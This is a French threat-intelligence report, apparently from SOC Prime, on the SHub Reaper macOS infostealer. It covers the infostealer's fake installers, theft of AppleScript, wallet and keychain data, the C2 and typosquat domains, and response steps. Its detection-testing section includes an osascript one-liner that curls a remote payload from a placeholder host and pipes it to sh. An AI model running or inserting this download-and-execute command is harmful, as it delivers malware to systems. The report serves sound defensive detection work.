SOC Prime Bias: Moyen

20 May 2026 22:15 UTC

SHub Reaper | Le voleur macOS imite Apple, Google et Microsoft dans une chaîne d’attaque unique

Author Photo
SOC Prime Team linkedin icon Suivre
SHub Reaper | Le voleur macOS imite Apple, Google et Microsoft dans une chaîne d’attaque unique
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport analyse une nouvelle variante de logiciel voleur d’informations pour macOS appelée SHub Reaper, qui utilise de faux installateurs WeChat et Miro pour livrer une charge utile AppleScript malveillante via un domaine Microsoft thématique mal orthographié. Une fois lancée dans Script Editor, la charge utile collecte les données du navigateur, les fichiers de portefeuille de cryptomonnaie et les informations du trousseau, puis exfiltre le contenu volé sous forme d’archives ZIP fractionnées. Le malware altère également les fichiers de portefeuille et établit une persistance via un LaunchAgent déguisé en mise à jour logicielle Google. La détection recommandée se concentre sur l’exécution d’AppleScript, la création suspecte de LaunchAgent et le trafic sortant vers l’infrastructure connue de commande et de contrôle.

Enquête

SentinelOne a suivi l’intégralité de la chaîne de livraison en plusieurs étapes, y compris l’utilisation abusive du schéma applescript:// , la génération dynamique de la charge utile AppleScript et un module de capture de fichiers qui reproduit le comportement de vol de documents vu dans AMOS. Les chercheurs ont capturé le trafic réseau vers le domaine de commande et de contrôle hebsbsbzjsjshduxbs.xyz et les points de terminaison associés, ainsi que la création de fichiers temporaires sous /tmp et un LaunchAgent placé dans le répertoire Bibliothèque de l’utilisateur. L’enquête a également révélé une fonctionnalité de bot Telegram codée en dur utilisée pour la télémétrie de l’opérateur.

Atténuation

Les défenseurs devraient bloquer l’accès aux domaines mal orthographiés mlcrosoft.co.com, qq-0732gwh22.com, et mlroweb.com, et surveiller les LaunchAgents créés sous des chemins imitant les composants de mise à jour Google. La liste d’autorisation des applications doit être utilisée pour restreindre l’exécution d’AppleScript à partir de sources non fiables, et une vérification stricte de la signature du code doit être appliquée. Les détections réseau devraient également alerter sur la communication avec le domaine de commande et de contrôle identifié et ses chemins d’API connus.

Réponse

Si une activité SHub Reaper est détectée, isolez immédiatement le point de terminaison affecté, terminez tout processus AppleScript ou LaunchAgent suspect et supprimez les fichiers malveillants de /tmp et de la Bibliothèque de l’utilisateur. Les enquêteurs doivent ensuite procéder à une collecte médico-légale complète des magasins de données du navigateur, des répertoires de portefeuille et des répertoires de crédentials, suivie de réinitialisations de crédentials là où une compromission est suspectée. L’infrastructure de commande et de contrôle identifiée doit être bloquée, et l’équipe de réponse aux incidents doit commencer une chasse aux menaces plus large à travers l’environnement.

Flux d’attaque

Exécution de la simulation

Prérequis : Le test prévol de la télémétrie et de la base doit avoir passé.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.

  • Narration de l’attaque & Commandes :
    L’attaquant crée un court one-liner qui utilise osascript pour exécuter une commande shell. Dans l’AppleScript, do shell script exécute curl pour télécharger un script shell distant (payload.sh) et le passe directement dans sh pour exécution. Comme toute la chaîne est intégrée dans une seule invocation AppleScript, macOS enregistre un seul process_creation événement dont la ligne de commande contient à la fois osascript and curl, satisfaisant ainsi la règle de détection.

  • Script de test de régression :

    #!/bin/bash
    #
    # Simule l'exécution de SHub Reaper sur macOS
    # Génère un seul événement process_creation contenant à la fois 'osascript' et 'curl'
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # One‑liner : osascript exécute une commande shell qui télécharge avec curl le payload et l'exécute
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • Commandes de nettoyage :

    #!/bin/bash
    #
    # Nettoie tous les artefacts créés par la simulation.
    # Le payload s'exécute en mémoire et n'écrit pas de fichiers, mais nous nous assurons qu'il n'y a pas de processus persistants.
    #
    # Tuer tous les processus 'sh' errants démarrés par le test (à utiliser avec prudence sur les systèmes de production)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"